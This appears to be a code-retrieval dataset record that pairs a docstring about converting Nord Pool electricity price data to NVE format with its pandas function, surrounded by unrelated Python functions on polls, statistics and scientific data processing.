"async def pollstatus(self):\n if not ongoingPoll():\n await ctx.send('There is no poll going on currently, sorry!')\n return\n question = fetchAttr('poll_data', 'question')\n opts = fetchAttr('poll_data', 'options')\n votesSoFar = fetchAttr('poll_data', 'votes')\n message = question + '\\n'\n for i in range(len(opts)):\n message += 'Option ' + str(i + 1) + ': ' + opts[i] + ', currently has ' + str(votesSoFar[i]) + ' votes.\\n'\n await ctx.send(message)",
"def single_pollrun(pollrun, responses, question):\n chart_type = None\n chart_data = []\n summary_table = None\n\n answers = Answer.objects.filter(response__in=responses, question=question)\n if answers:\n if question.question_type == Question.TYPE_OPEN:\n chart_type = 'open-ended'\n chart_data = word_cloud_data(answers)\n else:\n chart_type = 'bar'\n if question.question_type == Question.TYPE_NUMERIC:\n chart_data = single_pollrun_auto_categorize(answers)\n else:\n chart_data = single_pollrun_multiple_choice(answers, pollrun)\n\n _, answer_avgs, answer_stdevs, response_rates = utils.summarize_by_pollrun(\n answers, responses)\n summary_table = [\n ('Mean', answer_avgs.get(pollrun.pk, 0)),\n ('Standard deviation', answer_stdevs.get(pollrun.pk, 0)),\n ('Response rate average (%)', response_rates.get(pollrun.pk, 0)),\n ]\n\n return chart_type, chart_data, summary_table",
"def fetch_statistics(conf):\n return fetch_json(\"http://%s:%d/monitor/statistics.json\" % (conf[\"host\"], conf[\"port\"]), timeout=30)",
"def get_stats(self):\n \"\"\"\n Function to submit GET request to stats endpoint.\n\n Args:\n\n Returns:\n res (obj): Response object from GET request\n \"\"\"\n endpoint = '/stats'\n response = requests.get(baseUrl + endpoint)\n\n return response",
"def poll(self):\n data = self.get_data()\n if data:\n self.add_metrics(data)",
"def get_response_stats_data(question_id, user_response):\n webpage = 'https://willyoupressthebutton.com/{0}/'.format(question_id)\n if user_response:\n webpage += 'yes'\n else:\n webpage += 'no'\n\n webpage_content = get_webpage(webpage)\n\n soup = bs(webpage_content, 'html.parser')\n\n main_container = soup.find(id='maincontainer')\n\n if main_container is None:\n raise InvalidIndex({\n \"message\":\"No question found with that index\",\n \"index\": question_id\n })\n\n stats = [stat for stat in [a for a in main_container.find(id='statsBar').children][1].children]\n\n did_press = stats[1].getText()\n did_press_count = int(did_press.split()[0])\n did_press_percent = int(did_press[did_press.index('(') + 1: did_press.index(')') - 1])\n\n didnt_press = stats[3].getText()\n didnt_press_count = int(didnt_press.split()[0])\n didnt_press_percent = 100 - did_press_percent\n\n return {\n 'id': question_id,\n 'pro_count': did_press_count,\n 'con_count': didnt_press_count,\n 'pro_percent': did_press_percent,\n 'con_percent': didnt_press_percent\n }",
"def _gather_stats(self):\n # Set all values to zero\n self.wins = 0\n self.ties = 0\n self.losses = 0\n self.season_len = 0\n self.points = 0\n self.vs_points = 0\n self.win_percentage = 0.0\n self.point_difference = 0\n self.wins_vs_teams = []\n self.losses_vs_teams = []\n self.ties_vs_teams = []\n self.record_vs_teams = []\n self.f_record_vs_teams = []\n wins_list = []\n losses_list = []\n ties_list = []\n opponents = []\n # Gather statistics\n for g in self.season:\n # Gather the number of games won, lost, and tied\n g_result = g['result']\n opponent = g['vs']\n if opponent not in opponents:\n opponents.append(opponent)\n if g_result == 'w':\n self.wins += 1\n wins_list.append(g)\n elif g_result == 'l':\n self.losses += 1\n losses_list.append(g)\n elif g_result == 't':\n self.ties += 1\n ties_list.append(g)\n self.season_len += 1\n # Gather the number of runs scored\n g_points = g['points']\n self.points += g_points\n # Gather the number of runs scored by opponents\n g_vs_points = g['vs_points']\n self.vs_points += g_vs_points\n\n for opponent in opponents:\n self.wins_vs_teams.append(self._records_vs(wins_list, opponent))\n self.losses_vs_teams.append(self._records_vs(losses_list, opponent))\n self.ties_vs_teams.append(self._records_vs(ties_list, opponent))\n # Calculate win percentage\n try:\n self.win_percentage = self.wins / self.season_len\n except ZeroDivisionError:\n self.win_percentage = None\n\n # Calculate difference in points\n self.point_difference = self.points - self.vs_points\n\n # Calculate record against opponents\n for x in range(len(opponents)):\n self.record_vs_teams.append({opponents[x]: {'w': self.wins_vs_teams[x][opponents[x]],\n 'l': self.losses_vs_teams[x][opponents[x]],\n 't': self.ties_vs_teams[x][opponents[x]]}})\n self.f_record_vs_teams.append(\n f\"\"\"{opponents[x]}: {self.wins_vs_teams[x][opponents[x]]}-{self.losses_vs_teams[x][opponents[x]]}-{self.ties_vs_teams[x][opponents[x]]}\"\"\")",
"def get_stats(self):\n employees = self.object.employees_employed.all()\n total_employees = employees.count()\n\n birthplace_known_count = Employee.objects.birthplace_known(bureau_states=self.object).count()\n\n # Employees with date of birth filled\n employees_with_dob = employees.exclude(date_of_birth='')\n # Age in 1865\n ages = get_ages_in_year(employees_with_dob, 1865)\n\n stats = [\n ('Avg. age in 1865', get_float_format(get_mean(ages), places=1)),\n ('Median age in 1865', get_float_format(get_median(ages), places=0)),\n ('% VRC', get_float_format(self.object.percent_vrc_employees())),\n ('% USCT', get_float_format(\n get_percent(part=Employee.objects.usct(bureau_states=self.object).count(), total=total_employees))\n ),\n ('% Foreign-born', get_float_format(\n get_percent(part=Employee.objects.foreign_born(bureau_states=self.object).count(),\n total=birthplace_known_count))\n ),\n ('% Born there', get_float_format(\n get_percent(part=get_number_employees_born_in_bureau_state(employees, self.object),\n total=birthplace_known_count))\n ),\n ('% Female', get_float_format(\n get_percent(part=employees.filter(gender=Employee.Gender.FEMALE).count(), total=total_employees))\n ),\n ('% Identified as \"colored\"', get_float_format(\n get_percent(part=employees.filter(colored=True).count(), total=total_employees))\n ),\n ('% Died during assignment', get_float_format(\n get_percent(part=employees.filter(died_during_assignment=True).count(), total=total_employees))\n ),\n ('Former slaves', employees.filter(former_slave=True).count()),\n ('% Former slaveholder', get_float_format(\n get_percent(part=employees.filter(slaveholder=True).count(), total=total_employees))\n ),\n ('% Union veterans', get_float_format(\n get_percent(part=employees.filter(union_veteran=True).count(), total=total_employees))\n ),\n ('% Confederate veterans', get_float_format(\n get_percent(part=employees.filter(confederate_veteran=True).count(), total=total_employees))\n ),\n ('Left-hand penmanship contest entrants', employees.filter(penmanship_contest=True).count()),\n ]\n\n # Breakdown per AilmentType\n for ailment_type in AilmentType.objects.all():\n ailment_type_count = employees.filter(ailments__type=ailment_type).count()\n stats.append((f'% with {ailment_type}',\n get_float_format(get_percent(part=ailment_type_count, total=total_employees))))\n\n # Breakdown per Ailment, if more than one for the type\n if ailment_type.ailments.count() > 1:\n for ailment in ailment_type.ailments.all():\n ailment_count = employees.filter(ailments=ailment).count()\n stats.append((f'% with {ailment}',\n get_float_format(get_percent(part=ailment_count, total=total_employees))))\n\n return stats",
"def fetching_latest_quiz_statistics(request_ctx, course_id, quiz_id, all_versions, **request_kwargs):\n\n path = '/v1/courses/{course_id}/quizzes/{quiz_id}/statistics'\n payload = {\n 'all_versions' : all_versions,\n }\n url = request_ctx.base_api_url + path.format(course_id=course_id, quiz_id=quiz_id)\n response = client.get(request_ctx, url, payload=payload, **request_kwargs)\n\n return response",
"def get_attempt_stats(quiz, response):\n total_marks = 0\n correct_answer = 0\n incorrect_answer = 0\n total_number = Question.objects.filter(quiz=quiz, published=True).count()\n response_data = response.get_response()\n\n for qid in response_data:\n try:\n question = Question.objects.get(id=int(qid))\n except Question.DoesNotExists:\n # there might be other kind of data in response_data we don't care about\n continue\n question_type = QUESTION_TYPE[question.question_type]\n marks = question_type.get_marks(question, extract_response(response_data, qid))\n total_marks += marks\n if marks > 0:\n correct_answer += 1\n else:\n incorrect_answer += 1\n grade = round(total_marks / db.get_quiz_total_marks(quiz), 2)\n unanswered = total_number - (correct_answer + incorrect_answer)\n if quiz.quizsettings.showAnswersAfterAttempt:\n # Student allowed to see answer and hence the grade after attending quiz\n return dict(total_grade=grade, correct=correct_answer, incorrect=incorrect_answer, \n unanswered=unanswered, total_questions=total_number, showAnswer=True)\n return dict(total_grade='Shown after exam ends', unanswered=unanswered, total_questions=total_number, showAnswer=False)",
"def format_getstat1(self):\n\n raw_response = self.getstat1()\n response = {\n \"miner\": dict(),\n \"eth_pool\": dict(),\n \"dcr_pool\": dict(),\n \"GPUs\": dict(),\n }\n\n response[\"miner\"][\"version\"] = raw_response[0]\n hours = int(raw_response[1]) // 60\n minutes = int(raw_response[1]) % 60\n response[\"miner\"][\"runtime\"] = \"{:02d}:{:02d}\".format(hours, minutes)\n\n [\n response[\"eth_pool\"][\"total_hashrate\"],\n response[\"eth_pool\"][\"accepted\"],\n response[\"eth_pool\"][\"rejected\"],\n ] = [int(val) for val in raw_response[2].split(\";\")]\n if response[\"eth_pool\"][\"total_hashrate\"] > 0:\n response[\"eth_pool\"][\"total_hashrate\"] *= 1000\n\n [\n response[\"dcr_pool\"][\"total_hashrate\"],\n response[\"dcr_pool\"][\"accepted\"],\n response[\"dcr_pool\"][\"rejected\"],\n ] = [int(val) for val in raw_response[4].split(\";\")]\n if response[\"dcr_pool\"][\"total_hashrate\"] > 0:\n response[\"dcr_pool\"][\"total_hashrate\"] *= 1000\n\n response[\"eth_pool\"][\"pool\"] = raw_response[7]\n\n [\n response[\"eth_pool\"][\"invalid\"],\n response[\"eth_pool\"][\"pool_switches\"],\n response[\"dcr_pool\"][\"invalid\"],\n response[\"dcr_pool\"][\"pool_switches\"],\n ] = [int(val) for val in raw_response[8].split(\";\")]\n\n percard_eth_hashrate = [\n (int(val) * 1000) if val != \"off\" else 0\n for val in raw_response[3].split(\";\")\n ]\n\n percard_dcr_hashrate = [\n (float(val) * 1000) if val != \"off\" else 0\n for val in raw_response[5].split(\";\")\n ]\n\n tempsfans = raw_response[6].split(\";\")\n tempsfans = [\n [int(value), int(tempsfans[index + 1])]\n for index, value in enumerate(tempsfans)\n if not index % 2\n ]\n\n for gpu in range(len(percard_eth_hashrate)):\n response[\"GPUs\"][\"GPU {}\".format(gpu)] = {\n \"eth_hashrate\": percard_eth_hashrate[gpu],\n \"dcr_hashrate\": percard_dcr_hashrate[gpu],\n \"temp\": tempsfans[gpu][0],\n \"fan\": tempsfans[gpu][1],\n }\n response[\"miner\"][\"ip\"] = self.ip\n response[\"miner\"][\"port\"] = self.port\n\n return response",
"def calc_statistics(self):\n pass",
"def get_pivot_response_stats(pivot_id, pivot_type):\n cursor = connection.cursor()\n \n cursor.execute(\"\"\"\n SELECT plugin_option.plugin_id, plugin_option.value\n FROM drill_multiplechoiceresponse AS mcr\n INNER JOIN (\n SELECT pivot_qn.plugin_id, mco.id AS option_id, mco.value\n FROM (\n SELECT id, question_plugin_id AS plugin_id\n FROM drill_question\n WHERE pivot_type = \"%(pivot_type)s\"\n AND pivot_id = %(pivot_id)d\n ) AS pivot_qn\n INNER JOIN drill_multiplechoiceoption AS mco\n ON mco.question_id = pivot_qn.id\n ) AS plugin_option\n ON plugin_option.option_id = mcr.option_id\n \"\"\" % {'pivot_type': pivot_type, 'pivot_id': pivot_id})\n rows = cursor.fetchall()\n dist_map = {}\n plugin_ids_used = set(plugin_id for (plugin_id, error_value) in rows)\n for plugin_id in plugin_ids_used:\n dist_map[plugin_id] = FreqDist()\n \n for plugin_id, error_value in rows:\n dist_map[plugin_id].inc(error_value)\n \n plugin_map = drill_models.QuestionPlugin.objects.in_bulk(dist_map.keys())\n \n results = [(plugin_map[plugin_id].name, dist) \\\n for (plugin_id, dist) in dist_map.iteritems()]\n combined_dist = FreqDist()\n for name, dist in results:\n combined_dist.inc(name, dist.N())\n results[0:0] = [('By plugin type', combined_dist)]\n \n return results",
"def ratelimits(self, irc, msg, args):\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # make API call.\n data = self.twitterApi.ApiCall(\n \"application/rate_limit_status\",\n parameters={\"resources\": \"trends,search,statuses,users\"},\n )\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: Failed to lookup ratelimit data: {0}\".format(data))\n return\n # parse data;\n data = data.get(\"resources\")\n if not data: # simple check if we have part of the json dict.\n irc.reply(\n \"ERROR: Failed to fetch application rate limit status. Something could \"\n \"be wrong with Twitter.\"\n )\n log.error(\"Tweety: ERROR fetching rate limit data: {0}\".format(data))\n return\n # dict of resources and how to parse. key=name, values are for the json dict.\n resources = {\n \"trends\": [\"trends\", \"/trends/place\"],\n \"tsearch\": [\"search\", \"/search/tweets\"],\n \"twitter --id\": [\"statuses\", \"/statuses/show/:id\"],\n \"twitter --info\": [\"users\", \"/users/show/:id\"],\n \"twitter timeline\": [\"statuses\", \"/statuses/user_timeline\"],\n }\n # now iterate through dict above.\n for resource in resources:\n rdict = resources[resource] # get value.\n endpoint = data.get(rdict[0]).get(rdict[1]) # value[0], value[1]\n minutes = \"%sm%ss\" % divmod(\n int(endpoint[\"reset\"]) - int(time.time()), 60\n ) # math.\n output = \"Reset in: {0} Remaining: {1}\".format(\n minutes, endpoint[\"remaining\"]\n )\n irc.reply(\"{0} :: {1}\".format(self._bold(resource), output))",
"def get_all_pokemon_stats():\n\n database_handler = DatabaseAPIHandler()\n\n # There are 807 pokemon callable in the API.\n for pokemon_number in range(1, 808):\n pokemon_status_data = database_handler.get_pokemon_status_data(pokemon_number)\n database_handler.save_pokemon_status_data(pokemon_status_data)",
"def get_stats(self):\n\n self.collect_stats()\n\n #Query the DB\n\n\n return self.stat_fields",
"def get_score(self):\n jira = JiraServer()\n jira_response = jira.make_api_call(self.query)\n return self.process_jira_response(jira_response)",
"def count_votes(self):\n votes = AssignmentPollBallot.objects.filter(poll=self.poll)\n\n shares = None\n if self.principle and config['voting_enable_principles']:\n # Create a dict (key: delegate, value: shares).\n # Example: {1: Decimal('1.000000'), 2: Decimal('45.120000')}\n voting_shares = VotingShare.objects.filter(principle=self.principle)\n shares = dict(voting_shares.values_list('delegate', 'shares'))\n\n options = AssignmentOption.objects.filter(poll=self.poll).order_by('weight').all()\n pollmethod = self.poll.pollmethod\n\n result = {\n 'casted': [0, Decimal(0)],\n 'valid': [0, Decimal(0)],\n 'invalid': [0, Decimal(0)]\n }\n\n if pollmethod in ('yn', 'yna'):\n for option in options:\n result[str(option.candidate.id)] = {\n 'Y': [0, Decimal(0)], # [heads, shares]\n 'N': [0, Decimal(0)],\n }\n if pollmethod == 'yna':\n result[str(option.candidate.id)]['A'] = [0, Decimal(0)]\n else: # votes\n for option in options:\n result[str(option.candidate.id)] = [0, Decimal(0)]\n result['A'] = [0, Decimal(0)]\n result['N'] = [0, Decimal(0)]\n\n # Sum up the votes.\n for vote in votes:\n if vote.delegate is None:\n delegate_share = 1\n else:\n try:\n delegate_share = shares[vote.delegate.pk] if shares else 1\n except KeyError:\n # Occurs if voting share was removed after delegate cast a vote.\n continue\n\n if pollmethod in ('yn', 'yna'):\n # count every vote for each candidate\n for candidate_id, value in vote.vote.items():\n result[candidate_id][value][0] += 1\n result[candidate_id][value][1] += delegate_share\n else:\n if vote.vote in ('A', 'N', 'invalid'):\n result[vote.vote][0] += 1\n result[vote.vote][1] += delegate_share\n else:\n for candidateId in vote.vote:\n result[candidateId][0] += 1\n result[candidateId][1] += delegate_share\n result['casted'][0] += 1\n result['casted'][1] += delegate_share\n result['valid'][0] = result['casted'][0] - result['invalid'][0]\n result['valid'][1] = result['casted'][1] - result['invalid'][1]\n\n return result"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts nordpool data into NVE format. Only cities with an assigned "area number" will be extracted. See constants.NP2PO.
|
def standardize_nordpool(df: pd.DataFrame) -> pd.DataFrame:
std_rep = []
for _, row in df.iterrows():
for city, area_num in NP2PO.items():
data_item = {
DATE: row['Date'],
AREA_NUM: area_num,
"Price": row[city],
"Unit": "NOK/MWh",
DATA_SRC: "nordpool"
}
std_rep.append(data_item)
dset = pd.DataFrame(std_rep)
return dset
|
[
"def pipeline():\n f = Dataset('/Users/akapadia/Scratch/SpaceApps/data/cru_vap_clim_1991-2000.nc', 'r')\n time = f.variables['time'][:]\n lons = f.variables['longitude'][:]\n lats = f.variables['latitude'][:]\n vap = numpy.array(f.variables['vap'][:])\n units = f.variables['vap'].units\n \n num_of_months = vap.shape[0]\n # for month in xrange(num_of_months):\n # print vap[month]\n \n JAN = 0\n lon = 11.58\n lat = 48.15\n lonIndex = getGeographicIndex(lon , lons)\n latIndex = getGeographicIndex(lat, lats)\n\n print vap[0][latIndex][lonIndex], units",
"def nc_to_nps_int(inFile, outFile, date, xfcst, fields, source=None, \n geos2wrf=False, log=None, createIndividualFiles=False,\n expectedUnitsFile=None): \n if log is None:\n log = _default_log() \n flip_lats = False\n flip_lons = False\n # for each vertical level type in the netCDF file, map a standard\n # level ID (e.g. 'ps' for pressure) to its name in the netCDF file\n rootgrp_lev_types = {} # support multiple horizontal level types\n var2lev = {} # map 3d variables to lev_type\n if source == 'g5nr':\n (timeName,latName,lonName,rootgrp_lev_types['ps']) = ('time', 'lat', 'lon', \n 'lev')\n elif source == 'lis':\n latName = 'north_south'\n lonName = 'east_west'\n rootgrp_lev_types['sm'] = 'SoilMoist_profiles'\n rootgrp_lev_types['st'] = 'SoilTemp_profiles'\n timeName = None\n else:\n (timeName,latName,lonName,rootgrp_lev_types['ps']) = ('time', 'lat', 'lon',\n 'lev')\n # Set basic attributes\n if geos2wrf:\n hdate = '{:%Y-%m-%d_%H}'.format(date)\n else:\n hdate = '{:%Y:%m:%d_%H:%M:%S}'.format(date)\n log.debug(\"Reading file {}\".format(inFile)) \n rootgrp = nc4.Dataset(inFile, 'r')\n \n # read the dimensions\n # hack! Estimate lat/lon for LIS\n # (TODO : Fix by flattening lat/lon to 1-d and accounting for \n # the fact that lat/lon values are masked where there is no soil)\n # Actually, I don't think the nps_int file has a record of the lat/lon\n # values - it just uses the REF_LAT/REF_LON and DLAT/DLON, so we can\n # just use the attributes as already doing. The lat_var/lon_var are not\n # being used and the mask issue does not matter since we have the swCorner\n if source == 'lis':\n log.warn(\"Estimating lat/lon for LIS\")\n swLat = rootgrp.getncattr(\"SOUTH_WEST_CORNER_LAT\") \n swLon = rootgrp.getncattr(\"SOUTH_WEST_CORNER_LON\")\n deltalon = rootgrp.getncattr(\"DX\") \n deltalat = rootgrp.getncattr(\"DY\")\n numLats = len(rootgrp.dimensions[\"north_south\"])\n numLons = len(rootgrp.dimensions[\"east_west\"])\n neLat = swLat + (numLats * deltalat) \n neLon = swLon + (numLons * deltalon)\n lat_var = np.linspace(swLat, neLat, numLats)\n lon_var = np.linspace(swLon, neLon, numLons)\n # intermediate format wants west->east and south->north\n flip_lats = True\n flip_lons = True\n dx = 110.0 * deltalon\n dy = 110.0 * deltalat\n else:\n lat_var = rootgrp.variables[latName]\n lon_var = rootgrp.variables[lonName]\n if lat_var[0] > lat_var[1]:\n log.info(\"Flipping latitude values to go South->North\")\n flip_lats = True\n lat_var[:] = lat_var[::-1]\n if lon_var[0] > lon_var[1]:\n log.debug(\"Flipping longitude values to go West->East\")\n flip_lons = True\n lon_var[:] = lon_var[::-1]\n deltalat = ( lat_var[1] - lat_var[0] )\n deltalon = ( lon_var[1] - lon_var[0] ) \n dx = 110.0 * deltalon\n dy = 110.0 * deltalat\n \n \n # read the variables\n for (inName,outName,inUnits,description) in fields:\n log.debug(\"Processing {} variable '{}'\".format(source, inName))\n #var = rootgrp.variables[inName]\n # figure out if it is 2d or 3d\n # hack - only do this for met fields since the variable name\n # passed in for LSM variables is not the actual variable name \n # and we know that they are 3d\n if inName in ('SM', 'SoilMoist_tavg'):\n is_3d = True\n levType = 'sm'\n levName = rootgrp_lev_types['sm']\n log.warn(\"Reading 'SoilMoist_tavg' instead of passed in {}\".format(inName))\n var = rootgrp.variables['SoilMoist_tavg']\n varForUnitsHack = \"SM010200\" # hack: Need somthing that's in expected_units\n elif inName in ('ST', 'SoilTemp_tavg'):\n is_3d = True\n levType = 'st'\n levName = rootgrp_lev_types['st']\n log.warn(\"Reading 'SoilTemp_tavg' instead of passed in {}\".format(inName))\n var = rootgrp.variables['SoilTemp_tavg']\n #import pdb ; pdb.set_trace()\n varForUnitsHack = \"ST010200\" # hack: need something that's in expected_units\n else:\n is_3d = False # changed below if 3d\n try:\n var = rootgrp.variables[inName]\n except KeyError:\n log.critical(\"Variable {var} is not in dataset {inFile}\"\n .format(var=inName, inFile=inFile))\n sys.exit(1)\n for levType,levName in rootgrp_lev_types.iteritems():\n if levName in var.dimensions:\n is_3d = True\n log.debug(\"Treating variable '{}' as 3D\".format(inName))\n # now know level type for this variable is `levType'\n varForUnitsHack = outName\n\n (inUnits, out_units) = __verify_units(expectedUnitsFile, var, \n #inName, outName, inUnits, log)\n inName, varForUnitsHack, inUnits, log)\n\n # process\n if not is_3d:\n # NOTE : The slab should be a 2d variable with lon being the first\n # dimension (on the fortran side)\n dimNames = (timeName, latName, lonName, None)\n slab = get_2d_slab_from_var(var, dimNames, None, \n inUnits=inUnits, outUnits=out_units,\n flipLats=flip_lats,\n flipLons=flip_lons, log=log)\n xlvl = 200100.000000\n \n # set missing values - TODO this is SLOW, use Fortran\n try:\n slab[np.where(slab[:] == var.missing_value)] = NPS_INT_MISSING_VALUE\n except AttributeError:\n log.warn(\"Variable '{0}' does not have a 'missing_value' \"\n \"attribute; unable to set the NPS_INT_MISSING_VALUE\"\n .format(inName))\n\n altOutFile = _get_alt_out_file_path(createIndividualFiles, \n os.path.dirname(outFile),\n outName, 200100, date)\n #import pdb ; pdb.set_trace()\n write_slab_cyl(slab, outFile, hdate, xfcst, source, outName, \n out_units, description, xlvl, lat_var[0], lon_var[0], \n deltalat, deltalon, altOutFile=altOutFile)\n else: \n # 3d field\n dimNames = (timeName, latName, lonName, levName)\n log.info(\"For soil params, assuming we start at surface\")\n curr_start_depth = 0.\n levIdx = var.dimensions.index(levName)\n #for levCtr in range(1, var.shape[levIdx]+1):\n #for levCtr in range(var.shape[levIdx]-1, -1, -1):\n for levCtr in range(var.shape[levIdx]):\n slab = get_2d_slab_from_var(var, dimNames, lev=levCtr, \n flipLats=flip_lats,\n inUnits=inUnits, outUnits=out_units,\n flipLons=flip_lons, log=log)\n # set missing values - This is a bit SLOW, but not a bottleneck\n # TODO : Works for LIS. Ensure this works for g5nr data too.\n #import pdb ; pdb.set_trace()\n if isinstance(slab, np.ma.masked_array):\n missingIdc = np.where(slab.mask == True)\n else:\n missingIdc = np.where(slab[:] == var.missing_value)\n slab[missingIdc] = NPS_INT_MISSING_VALUE\n # Set xlvl and outName (if necessary) according to levType\n if levType in ('sm', 'st'):\n # soil moisture/temperature level - need to change \n # outName according to depth range\n # This only works for LIS, AFAIK\n xlvl = 200100.000000\n thicknesses = rootgrp.getncattr('SOIL_LAYER_THICKNESSES')\n thicknesses = [ v.round() for v in thicknesses ]\n if thicknesses != ASSUMED_SOIL_THICKNESSES:\n log.warn(\"Unexpected thicknesses: {},{},{},{}\"\n .format(thicknesses))\n curr_end_depth = curr_start_depth + thicknesses[levCtr]\n pfx = levType.upper()\n log.info(\"Overriding variable name for soil moist./temp.\")\n outName = nps_utils.get_nps_soil_field_name(\n pfx, int(curr_start_depth), int(curr_end_depth) )\n log.info(\"Overriding description for soil moist./temp.\")\n description = nps_utils.get_nps_soil_field_description(\n pfx, int(curr_start_depth), int(curr_end_depth) )\n curr_start_depth = curr_end_depth\n elif levType == 'ps':\n # pressure level meteorological variable \n #xlvl = rootgrp_lev_types[levType].levIdx\n msg = \"Just putting indices for 'lev' ala NPS.\"\n if not msg in __already_logged:\n log.warn(msg)\n __already_logged.append(msg)\n xlvl = levCtr + 1 # fortran\n else:\n raise Exception(\"Unknown height/level dimension type\")\n \n altOutFile = _get_alt_out_file_path(createIndividualFiles, \n os.path.dirname(outFile),\n outName, xlvl, date)\n \n write_slab_cyl(slab, outFile, hdate, xfcst, source,\n outName, out_units, description, xlvl, \n lat_var[0], lon_var[0], deltalat, deltalon, \n altOutFile=altOutFile)",
"def nodal_development_area_etl():\r\n with arcetl.ArcETL(\"Nodal Development Areas\") as etl:\r\n etl.extract(dataset.NODAL_DEVELOPMENT_AREA.path(\"maint\"))\r\n etl.transform(\r\n arcetl.features.dissolve,\r\n dissolve_field_names=dataset.NODAL_DEVELOPMENT_AREA.field_names,\r\n tolerance=TOLERANCE[\"xy\"],\r\n )\r\n etl.load(dataset.NODAL_DEVELOPMENT_AREA.path(\"pub\"))",
"def get_nuts_codes():\n\n with open(GEOCODES_FILE) as stream:\n lines = csv.DictReader(stream)\n geocodes = []\n for i, line in enumerate(lines):\n # The first line has an empty NUTS-code\n if i > 0:\n geocode = line['NUTS-Code']\n geocodes.append(geocode)\n\n logging.debug('Loaded %d NUTS geocodes', len(geocodes))\n return tuple(geocodes)",
"def province_fetch(self):\n\n url = 'https://raw.githubusercontent.com/J535D165/CoronaWatchNL/master/data/rivm_NL_covid19_province.csv'\n\n logger.debug('Fetching Netherland province-level confirmed data from NLD_CW')\n\n return pd.read_csv(url)",
"def vcf2snapp(vcf_file, output_file):\r\n\r\n fh = open(vcf_file)\r\n\r\n chroms = []\r\n\r\n for line in fh:\r\n\r\n # Skip header\r\n if line.startswith(\"##\"):\r\n pass\r\n elif line.startswith(\"#CHROM\"):\r\n # Get taxa information\r\n taxa_list = line.strip().split()\r\n nexus_data = OrderedDict((x, []) for x in taxa_list[9:])\r\n elif line.strip() != \"\":\r\n fields = line.strip().split()\r\n\r\n ref_snp = fields[3]\r\n alt_snp = fields[4]\r\n\r\n # If SNP is not bialleic, ignore\r\n if len(alt_snp) > 1:\r\n continue\r\n\r\n # Record data for each Taxon\r\n for tx in nexus_data:\r\n # Get genotype\r\n gen = fields[taxa_list.index(tx)]\r\n gen = gen.split(\":\")[0]\r\n\r\n if gen == \"./.\":\r\n nexus_data[tx].append(\"-\")\r\n elif gen == \"0/0\":\r\n nexus_data[tx].append(\"0\")\r\n elif gen == \"1/1\":\r\n nexus_data[tx].append(\"2\")\r\n elif gen == \"1/0\" or gen == \"0/1\":\r\n nexus_data[tx].append(\"1\")\r\n\r\n\r\n # Write nexus files\r\n nexus_fh = open(output_file, \"w\")\r\n\r\n # Write header\r\n ntaxa = len(nexus_data)\r\n nloci = len(nexus_data[tx])\r\n nexus_fh.write(\"#NEXUS\\nBEGIN Data;\\n\\tDIMENSIONS NTAX={} NCHAR={};\\n\\t\"\r\n r'FORMAT DATATYPE=standard SYMBOLS=\"012\" INTERLEAVE=no missing=-;'\r\n \"\\n\"\r\n \"Matrix\\n\".format(ntaxa, nloci))\r\n\r\n # Write Data\r\n for tx in nexus_data:\r\n nexus_fh.write(\"{}\\t{}\\n\".format(tx, \"\".join(nexus_data[tx])))\r\n\r\n # Write file ending\r\n nexus_fh.write(\";\\nEND;\\n\")\r\n nexus_fh.close()",
"def regrid_process_based_field_to_12x12km():\n from sparse2spatial.ancillaries2grid import regrid_ds_field2G5NR_res\n # Load data\n data_root = utils.get_file_locations('data_root')\n folder = '/{}/../Oi/UEA/'.format(data_root)\n filename = 'iodide_from_model_ALL_interp.nc'\n ds = xr.open_dataset(folder+filename)\n filename2save = 'iodide_from_model_ALL_interp_0.125x0.125'\n regrid_ds_field2G5NR_res(ds, folder2save=folder, save2netCDF=True,\n filename2save=filename2save)",
"def read_ncep(ncdf_path,year):\r\n\r\n # path to the netcdf files\r\n ncdf_AT_file = os.path.join(ncdf_path,'.'.join(['air','{:0>4}'.format(year),'nc']))\r\n ncdf_GH_file = os.path.join(ncdf_path,'.'.join(['hgt','{:0>4}'.format(year),'nc']))\r\n ncdf_SH_file = os.path.join(ncdf_path,'.'.join(['shum','{:0>4}'.format(year),'nc']))\r\n\r\n print('Read global',year,'NCEP data ...')\r\n # Air Temperature\r\n DATA = read_data(netCDF4.Dataset(ncdf_AT_file,'r'), ['air'])\r\n if len(DATA['air']) < 17:\r\n print('Need 17 levels of AT data: found only ',len(lev_AT))\r\n\r\n # Specific Humidity\r\n SHUM_DATA = read_data(netCDF4.Dataset(ncdf_SH_file,'r'), ['shum'])\r\n if len(SHUM_DATA['level']) < 8:\r\n print('Need 8 levels of SH data: found only ',len(lev_SH))\r\n\r\n if list(SHUM_DATA['level'])!=list(DATA['level'][:len(SHUM_DATA['level'])]):\r\n print('Warning: air and shum do not share the same lower pressure levels')\r\n\r\n DATA.update(SHUM_DATA)\r\n\r\n # Geopotential Height\r\n GH_DATA = read_data(netCDF4.Dataset(ncdf_GH_file,'r'), ['hgt'])\r\n if len(GH_DATA['level']) < 17:\r\n print('Need 17 levels of GH data: found only ',len(lev_GH))\r\n\r\n DATA.update(GH_DATA)\r\n\r\n for key in DATA:\r\n if 'air' in key:\r\n DATA[key.replace('air','T')] = DATA[key]\r\n del DATA[key]\r\n if 'hgt' in key:\r\n DATA[key.replace('hgt','H')] = DATA[key]\r\n del DATA[key]\r\n if 'shum' in key:\r\n DATA[key.replace('shum','QV')] = DATA[key]\r\n del DATA[key]\r\n\r\n DATA['lev'] = DATA['level']\r\n del DATA['level']\r\n\r\n return DATA",
"def parse_nids(self, nids):\n r = self.experiment.r\n if nids == None:\n nids = sorted(r.n) # use active neurons\n elif nids == 'quiet':\n nids = sorted(r.qn) # use quiet neurons\n elif nids == 'all':\n nids = sorted(r.alln) # use all neurons\n else:\n nids = tolist(nids) # use specified nids\n neurons = [ r.alln[nid] if nid in r.alln else None for nid in nids ]\n return nids, neurons",
